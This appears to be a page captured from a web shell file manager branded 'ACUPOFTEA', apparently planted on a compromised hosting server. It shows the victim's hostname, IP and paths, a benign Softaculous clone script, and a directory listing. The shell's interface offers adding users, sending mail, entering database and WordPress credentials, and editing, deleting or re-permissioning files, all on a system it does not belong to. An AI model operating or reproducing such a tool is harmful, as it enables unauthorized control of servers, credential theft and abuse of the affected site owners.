System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
goffice62
/
216.73.216.168
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
_clone.php
<?php ////////////////////////////////////////////////////////////// //=========================================================== // clone.php //=========================================================== // SOFTACULOUS // Version : 4.2.8 // Inspired by the DESIRE to be the BEST OF ALL // ---------------------------------------------------------- // Started by: Alons // Date: 10th Jan 2009 // Time: 21:00 hrs // Site: http://www.softaculous.com/ (SOFTACULOUS) // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- //=========================================================== // (c)Softaculous Inc. //=========================================================== ////////////////////////////////////////////////////////////// if(!defined('SOFTACULOUS')){ die('Hacking Attempt'); } //The Install process function __clone(){ global $__settings, $error, $software, $globals, $replace_data, $source_data; //Do we meet the Minimum software requirements __requirements(); if(!empty($error)){ return false; } $temp = parse_url($source_data['softurl']); $source_data['relativeurl'] = $temp['path']; $temp = parse_url($__settings['softurl']); $__settings['relativeurl'] = $temp['path']; $__settings['domhost'] = $temp['host']; $__settings['protocol'] = $temp['scheme']; sclone_replace($replace_data, $__settings['softpath'].'/config.php', true); //sql $query = "SELECT `content` FROM `go_templates` WHERE `id`='1';"; $result = sdb_query($query, $__settings['softdbhost'], $__settings['softdbuser'], $__settings['softdbpass'], $__settings['softdb']); $source = $result[0]['content']; soft_preg_replace('/Date(.*?)Message\-ID(.*?)\@(.*?)\>(.*?)\-\-\\r\\n/is', $source, $domhost, 3); $destination = str_replace($domhost,$__settings['domhost'],$source); $update = "UPDATE `go_templates` SET `content`='".$destination."' WHERE `id`='1';"; sdb_query($update, $__settings['softdbhost'], $__settings['softdbuser'], $__settings['softdbpass'], $__settings['softdb']); if(sfile_exists($__settings['softpath'].'/.htaccess')){ // If the installation is on root domain we need to change the below relative URL if(is_dom_root($source_data['softpath'])){ $replace_data['RewriteBase \'/\''] = 'RewriteBase \''.$__settings['relativeurl'].'\''; $replace_data['RewriteBase /'] = 'RewriteBase '.$__settings['relativeurl']; $replace_data['RewriteRule ^webdav(.*)$ /modules/dav/files.php'] = 'RewriteRule ^webdav(.*)$ '.$__settings['relativeurl'].'/modules/dav/files.php'; $replace_data['RewriteRule ^caldav(.*)$ /modules/caldav/calendar.php'] = 'RewriteRule ^caldav(.*)$ '.$__settings['relativeurl'].'/modules/caldav/calendar.php'; $replace_data['RewriteRule ^carddav(.*)$ /modules/carddav/addressbook.php'] = 'RewriteRule ^carddav(.*)$ '.$__settings['relativeurl'].'/modules/carddav/addressbook.php'; $replace_data['RewriteRule ^Microsoft-Server-ActiveSync(.*)$ /modules/z-push/index.php'] = 'RewriteRule ^Microsoft-Server-ActiveSync(.*)$ '.$__settings['relativeurl'].'/modules/z-push/index.php'; }elseif(is_dom_root($__settings['softpath'])){ $replace_data['RewriteBase \''.$source_data['relativeurl'].'\''] = 'RewriteBase \'/\''; $replace_data['RewriteBase '.$source_data['relativeurl']] = 'RewriteBase /'; $replace_data['RewriteRule ^webdav(.*)$ '.$source_data['relativeurl'].'/modules/dav/files.php'] = 'RewriteRule ^webdav(.*)$ /modules/dav/files.php'; $replace_data['RewriteRule ^caldav(.*)$ '.$source_data['relativeurl'].'/modules/caldav/calendar.php'] = 'RewriteRule ^caldav(.*)$ /modules/caldav/calendar.php'; $replace_data['RewriteRule ^carddav(.*)$ '.$source_data['relativeurl'].'/modules/carddav/addressbook.php'] = 'RewriteRule ^carddav(.*)$ /modules/carddav/addressbook.php'; $replace_data['RewriteRule ^Microsoft-Server-ActiveSync(.*)$ '.$source_data['relativeurl'].'/modules/z-push/index.php'] = 'RewriteRule ^Microsoft-Server-ActiveSync(.*)$ /modules/z-push/index.php'; } sclone_replace($replace_data, $__settings['softpath'].'/.htaccess', true); } @srm($__settings['softpath'].'/tmp/cache/'); @srm($__settings['softpath'].'/tmp/diskcache/'); @srm($__settings['softdatadir'].'/cache/'); @smkdir($__settings['softdatadir'].'/cache/', $globals['odc']); schmod($__settings['softpath'].'/tmp/', $globals['odc'],1); schmod($__settings['softdatadir'].'/', $globals['odc'],1); } //Check whether the Minimum Software configuration matches function __requirements(){ global $__settings, $error, $software; return true; } ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-03-19 09:39:41
..
DIR
-
drwxr-xr-x
2026-03-20 09:38:47
images
DIR
-
drwxr-xr-x
2026-03-19 09:39:41
php53
DIR
-
drwxr-xr-x
2026-03-19 09:39:41
php56
DIR
-
drwxr-xr-x
2026-03-19 09:39:41
php71
DIR
-
drwxr-xr-x
2026-03-19 09:39:41
php81
DIR
-
drwxr-xr-x
2026-03-19 09:39:41
php82
DIR
-
drwxr-xr-x
2026-03-19 09:39:41
.htaccess
text/plain
537 B
-rw-r--r--
2021-12-23 06:54:36
NOTES.txt
text/plain
3.3 KB
-rw-r--r--
2026-02-20 03:01:36
_clone.php
text/x-php
4.57 KB
-rw-r--r--
2026-01-12 01:37:12
config.php
text/x-php
258 B
-rw-r--r--
2026-02-20 03:01:36
cookie_1.txt
text/plain
131 B
-rw-r--r--
2025-12-16 06:45:26
edit.php
text/x-php
5.69 KB
-rw-r--r--
2026-03-18 07:44:52
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
8.77 KB
-rw-r--r--
2026-03-18 07:44:52
fileindex.php
text/plain
254 B
-rw-r--r--
2026-01-28 06:50:42
goffice62symlinks.php
text/x-php
1.51 KB
-rw-r--r--
2023-09-27 07:00:32
import.php
text/x-php
4.71 KB
-rw-r--r--
2026-03-18 07:44:52
info.xml
text/html
4.85 KB
-rw-r--r--
2026-03-18 01:03:00
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
13.46 KB
-rw-r--r--
2026-03-18 07:44:52
install.xml
text/html
850 B
-rw-r--r--
2024-04-03 09:10:48
md5
text/plain
2.73 KB
-rw-r--r--
2026-03-18 07:44:52
update_pass.php
text/x-php
497 B
-rw-r--r--
2023-11-20 02:28:54
upgrade.php
text/x-php
11.4 KB
-rw-r--r--
2026-03-18 07:44:52
upgrade.xml
text/plain
322 B
-rw-r--r--
2023-11-28 05:53:24
~ ACUPOFTEA - mail.ontime-ae.com